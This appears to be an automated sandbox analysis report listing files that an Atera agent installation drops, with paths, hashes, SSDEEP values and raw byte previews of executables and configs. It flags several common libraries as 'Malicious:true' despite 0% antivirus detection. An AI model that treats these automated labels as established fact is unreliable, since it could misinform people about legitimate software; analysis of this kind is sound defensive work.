                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1346409
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999112358714754
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:pBIpj/UxSFjQRUWNqDqb9JFOThCrI0rQIhPFhvWupUxNjcaPkH:pWpwwFsiWNqs9CThCrIEQUFhv+NjzE
                                                                                                                                                                                                                                                                                              MD5:B6DCC5B35594B03E37653026C02A869A
                                                                                                                                                                                                                                                                                              SHA1:84B2D4A35FDE41CE12DFC15760B44F2EDC0BD87B
                                                                                                                                                                                                                                                                                              SHA-256:986582F17A980254DB23F364423EC30DEDC09071947789CCAD13A35570F4DCF6
                                                                                                                                                                                                                                                                                              SHA-512:10D8A20F85572643D4DC4B33E4593E04057405F7FC97E21D8DC10F224C46E80FF1A7F4F15C3E22DF7EBC2F634F4C769DA8EB5858F1FCB46457209E93DBF72F97
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK.........9fY................Agent.Package.Availability/PK.........9fY.>?.........?...Agent.Package.Availability/Agent.Package.Availability.deps.json..^U8M......T|g.\A$\l.....I]k.$.#28..y.,j..J.9..;F.7>i.q.}....[Eu..+G.a9..G...._..{...E...6...._V... .~.6.................q.....$M.....$..`o...5.vv. .. "....=.^...c. iH..6*.m/k].?B.*P2..76".~<gF.6.....Q4...dx.E...gI...=./*.z..=.hQ.@A.\.M...hj....?..D.I^=...w..F..(..~..s.Jz...Y.u;..mso..R......'o....j..G...}.A......t.......1$.........!....p..+.9.$.1..t.s.b:Dr..x~cm>d...j.a...]....-.y......p..2c.....r..,.{....F.N.-rF...kU."....U_p..-.^H....d2.J..k.f...p._.d.!....Ye.k.j%.\.*...+....2N.v.....`.X..u.R.N"...F.W...d....T...:........P:....@U.`3.....I.u':9,.>mI..........D\.4w..e..E....v7.i..p..4.u..7....@:G.........5..!.. .-...]..^.;..w2.i./+.<r..Q..$S.....J....H.t..&,0...L/..R.........'NW`to..?j......8.....N...V..e..<*..4S..2.S.|.U.2x.N.%.....uSt..[V.....[O..P..<..b_.kk.I..f.............f2K...^l.O...$.g.z..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.deps.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32679
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.993467033531541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:YMiXbLuNFLgxnzeynrL390PbFM1Orsc+enjBy6qY2871Yu9IM8yzI:YHX+CRN0PbG1Orsc7XqYR71YyIM8II
                                                                                                                                                                                                                                                                                              MD5:38486C0ACFBA470AAC49D49A89B5DF27
                                                                                                                                                                                                                                                                                              SHA1:6BD5DE6CB5B60475612E768DB50BBC45936B5AFD
                                                                                                                                                                                                                                                                                              SHA-256:57825C85B5FD5FFBD35133FD24139BC623C10B50CBF9103E11B4E86E78225E54
                                                                                                                                                                                                                                                                                              SHA-512:BC7426C19CF9E74379785678A528A38E0D4005338B7F0A5039C2C3A46C8874FD04A5FE94D8BEE07CAEFE8AAA2A88E5E59179B7080CCB012F8F2FD4211C69A2D0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Availability/0.16": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.0.0",.. "MQTTnet": "4.1.2.350",.. "MQTTnet.Extensions.ManagedClient": "4.1.2.350".. },.. "runtime": {.. "Agent.Package.Availability.dll": {}.. }.. },.. "Microsoft.Extensions.Configuration/6.0.0": {.. "dependencies": {.. "Microsoft.Extensions.Configuration.Abstractions": "6.0.0",.. "Microsoft.Extensions.Primitives": "6.0.0".. },.. "runtime": {.. "lib/netstandard2.0/Microsoft.Extensions.Configuration.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.21.52210".. }.. }.. },.. "Microsoft.Extensions.Configuration.Abstractions/6.0.0": {..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3186377650567
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:tpU+qNEN8hGUdlhkjqMCgoGIxBNPlaWxk4TKZ08gDT7iC6gW3GIXtHEje4TEpYiF:zU+CkuMChNPlakNcgD8ge1+Js76NA
                                                                                                                                                                                                                                                                                              MD5:8569FD90EA1BF5ECCCA2425B9BC7143A
                                                                                                                                                                                                                                                                                              SHA1:E5AC06B45E15D1E638526AE181FB0594E54C0BD3
                                                                                                                                                                                                                                                                                              SHA-256:000C035B77D9E882FC21D5C3E1BA84D8FB7BFE39BCCD9349657719D8CBF80AED
                                                                                                                                                                                                                                                                                              SHA-512:81451E5F80A02D913BA20F0F6B882FAA48CED88EBAC6922397031C2227C20B37E82FF4A9108C52D57A9C1F70C486E06E85CCAD1BEB780D180F1F651697804C9E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....z..........."...0.................. ........@.. .......................@............`.....................................O.......................P(... ......d................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......8^...z..........L.................................................(....*^.(.......J...%...}....*:.(......}....*:.(......}....*...0..7.........(....}A......}B......}@.....|A.....(...+..|A...(....*..(....*..0...........(....o.......(....*..(......}......o....r...p(....}....*....0..7.........(....}W......}X......}V.....|W.....(...+..|W...(....*..0..?.........(....}\......}]......}^......}[.....|\.....(...+..|\...( ...*..0..7.........(!...}b......}c......}a.....|b.....(..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):161872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.231624623837034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:T5vnr5Tbx829UOeKnn2LFzZBp13u36wKp4CULCbodli:TBKjK2LFzZNfJULyZ
                                                                                                                                                                                                                                                                                              MD5:1922740D2479C7D0CD6FB57C3D739543
                                                                                                                                                                                                                                                                                              SHA1:877A807A396156BE1D0C2782391CABC29EA15760
                                                                                                                                                                                                                                                                                              SHA-256:20443F66E184311FD412158CB162E36B0172332CD6D401CEC9EE5FE17DF75E58
                                                                                                                                                                                                                                                                                              SHA-512:D624BAD0FCD8AFC190A5DE241DA341A3F39D6AAA0E5EACDF8B14E8E74515B688F06E2CDC75DA0634880EA98238A1D26CD2D2BFAEDB6D92067DACE99D0963975C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.J.^.J.^.J.+.K.^.J.+.K.^.J.+.K.^.J.&GJ.^.J^,.K.^.J.^.J@^.JG+.K.^.JG+.K.^.JRich.^.J........................PE..d......f..........".................P@.........@....................................N.....`.................................................|(...............`..L....P..P(.......... ...T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data...X....@......."..............@....pdata..L....`.......,..............@..@_RDATA...............B..............@..@.reloc...............D..............@..B.rsrc................H..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8073549220576055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhVLD:WDLD
                                                                                                                                                                                                                                                                                              MD5:9A7D20AAA012D185DB528C72378B0ACB
                                                                                                                                                                                                                                                                                              SHA1:CD17C5DDB04E5CBAEBA56BB883B2BD0BF8C529DE
                                                                                                                                                                                                                                                                                              SHA-256:CBA7D06C662A6601164CBC5A0F4086E247DC1ACA7CCF2F72F4443C88DDB29095
                                                                                                                                                                                                                                                                                              SHA-512:961707F9926401EED9FDF892484527D253514F336B2AEF0A450184EE125DB940823E933739ABED422BC97B37E4094EFB3C9C355154F86984EB36508ED28BEE90
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=0.16..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.runtimeconfig.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):253
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.585549446641918
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:3Hp/hdNyhAkI/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkp5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                                                                              MD5:24E4653829DE1022D01CD7DDD26E2F22
                                                                                                                                                                                                                                                                                              SHA1:9160A009CB381E044BA4C63E4435DA6BFEB9DC6D
                                                                                                                                                                                                                                                                                              SHA-256:DED3AEB5856A11DB0B654A785574490CAB55839EBFB17EFE9E39B89618FC5B91
                                                                                                                                                                                                                                                                                              SHA-512:EFD4BBBA1BAEC0B47003831510E3AA539DB9EF468E0F06BA9D7BA6D0B3800035F7C818D7D90171BFD377EC97D08C4617555BCFF635DD83EFCEB412B1A9CCA820
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23062387412576
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:p36VpFishtGAb2BAst2t1z2C0qePts2+lpmjouk3KKlGT1S3k7Z2GEpYi60X2M:OFan4tkC0qH2ip2ouXi21oG2n76c
                                                                                                                                                                                                                                                                                              MD5:1E5A96F64AB2BD11D6D6ABE917B6DEF0
                                                                                                                                                                                                                                                                                              SHA1:B5E3B831BD0FD638B83553352F31088D67846F03
                                                                                                                                                                                                                                                                                              SHA-256:49747FAB0830BEA9BED2ADCE543E61F75FF748340B78CF08CA598F9577B9C62E
                                                                                                                                                                                                                                                                                              SHA-512:7673DBBA81AD88CC13AF1C195154D1D5764A343AAE59B67D5C97355FEF40E67CF4E517878A600E42759167B8B357D0FDCBAED4CAA99AD522D60E8CF00CB86CE5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%oA..........." ..0.............Z.... ........... ....................... ............`.....................................O.......t...............P(........................................................... ............... ..H............text...`.... ...................... ..`.rsrc...t...........................@..@.reloc..............................@..B................<.......H.......4P................................................................{....*..{....*..{....*r.(......}......}......}....*....0..Y........u........L.,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*.*....0..K....... M.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{"...*:.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):54352
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2479944729426595
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:wjPkdaG23BdHAnoekKhbdzn9kpWcwfRLzfoZrx6nnPMfm8XoJE5GtSdxEpYi60a:ePGShI7mW1ZoZrcn0e0oJ4Gtu676f
                                                                                                                                                                                                                                                                                              MD5:EA230454940D473CF51913ACA3B16652
                                                                                                                                                                                                                                                                                              SHA1:278C6D8FF7EA387B6B4FDC4063E891CD73B537CB
                                                                                                                                                                                                                                                                                              SHA-256:ACBBA44A069132A6B42EDF97F9301638AC048BB40BFF03ED14A40ADF95B1FC71
                                                                                                                                                                                                                                                                                              SHA-512:7E8617D67CDC23B5877438FBC1A17B552CC7F6D60237ECCAF557E385F0B450860D7678750D8B17B501936C33F9B41C03286D86EB35C19A4B61FDDCCFA3AE4F44
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\............" ..0.............V.... ........... ....................... ............`.....................................O.......x...............P(..............T............................................ ............... ..H............text...\.... ...................... ..`.rsrc...x...........................@..@.reloc..............................@..B................6.......H........Z...c............................................................(....*^.(.......V...%...}....*:.(......}....*:.(......}....*..(......%-.&r...ps....z}......}....*..{....*..{....*v.(......%-.&r...ps....z}....*..{....*V.(......}......}....*..{....*..{....*..{....*"..}....*..{....*"..}....*J.(....}.....(....*&..}.....*&..}.....*.0..)........-.r'..ps....zs.......o......o....}.....*..{....-.r7..ps....zs/...%.{....o,...%.{....o....*J.(....}.....(....*...0...........s....}.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):311888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.172921538830622
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:7F0eAyIQXbKwPMF83GUN/7a3zyROhmogpE2/M3jA:78QLKwPMKGUuBhh33jA
                                                                                                                                                                                                                                                                                              MD5:157CC7C91E4BD0762F22115A83FD1304
                                                                                                                                                                                                                                                                                              SHA1:15346E10DC67CDB18D1BA2907B9EA0C8639DC620
                                                                                                                                                                                                                                                                                              SHA-256:BC1009ABB39FF7FD048EFFB52E586B2D1C14B9499A195DE4AA750C3613F2DE49
                                                                                                                                                                                                                                                                                              SHA-512:D196C7E35FE131703FE2214A341CAF1B24162C53D168E552BB1EB292ACA91A7B60C682D3E18179483BAE5B30901A43F4640F04604604FF3EB1C7E25D84E302CE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ...............................B....`....................................O.......................P(..............T............................................ ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..0...........{....-..{....(....,.r...ps....zs....%.{....o....%.{....o....%.{....o....%.{....o....%.{....o....%.{....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26192
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.566795920462708
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ym++Js0qJ63NU17qtlR9iaTG/0wEzRjz6sMHJhOnAWM/aWsrNWsNyb8E9VF6IYic:3lso3W7qHypd//S7EpYi60sAw
                                                                                                                                                                                                                                                                                              MD5:0F40262268DB5E64DC7860A799B14784
                                                                                                                                                                                                                                                                                              SHA1:ABFB078EC0A37045F909E58DF75994103E7576B6
                                                                                                                                                                                                                                                                                              SHA-256:BAF1C2217E59C905521F286C506291B1EF07FBAE426B804927AFF448B57C58C2
                                                                                                                                                                                                                                                                                              SHA-512:0D45A8F062813F84BE24976C642C953A9367DCC7543136A40A92BEF8216647BCAA7B8C58E84825C264F10D37C0319F92122DAC4FF498441B35EB09CD4980E816
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..2...........Q... ...`....... ..............................6.....`................................./Q..O....`...............>..P(...........P..T............................................ ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................cQ......H.......X'...#.......... K..p....O.......................................~....*..0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("...*...((...*.(....,.r...p......%...%...%...("...*....()...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):34896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.489176330590773
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:DRnQyuN61yKW1Guh2dIewN3czA8i1Krao8EpYi60RD:DdgA1yKW1L0dkNc081+oV76E
                                                                                                                                                                                                                                                                                              MD5:34B8504411DAF6B69B362203E11DB477
                                                                                                                                                                                                                                                                                              SHA1:34A1FC5F1A073725E358AE2BE24D67C3A9013EED
                                                                                                                                                                                                                                                                                              SHA-256:E60445F54E33A72F2D8793A25C0F1E25DFA2D3B8189C5BC3EE477502BA920140
                                                                                                                                                                                                                                                                                              SHA-512:4D88EEEBC8E7A380D85DC8F55F4E58E14CB635FA801AC04FE246AAC1EA1F79ED663C5947ABEE2074DAEDBC85C97311159D3DFBB1FCECEB048177FADADC453374
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........." ..0..V...........u... ........... ..............................oJ....`..................................u..O....................`..P(...........t..T............................................ ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......p/...9..........Hi.......t........................................(....*^.(.......5...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...( ...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24144
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.679156647753176
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:I99FrztnCvZrlMIPTlLn9by3WKbW97nWaNyb8E9VF6IYijSJIVxut8X7d/oE:Abztn2AmxniKfEpYi60ZeE
                                                                                                                                                                                                                                                                                              MD5:63030F7861AFE3D57EEA5278B14671B6
                                                                                                                                                                                                                                                                                              SHA1:130B90DA81BCD69549D7272DCC04ADDAB1DC18D2
                                                                                                                                                                                                                                                                                              SHA-256:77A8B815ABF8316E41D5A20DACE2B1EBC7A21D55B0D812B0B29E564C1A79BD1D
                                                                                                                                                                                                                                                                                              SHA-512:82730F5B15201E669706EFF1DC617FCDC69ADAAF916F6127291999382DF631769387CCF06B70B52AC2BAA8A08A25CC81CA00B7CB2D6F4908D3A84F9E464B8E74
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
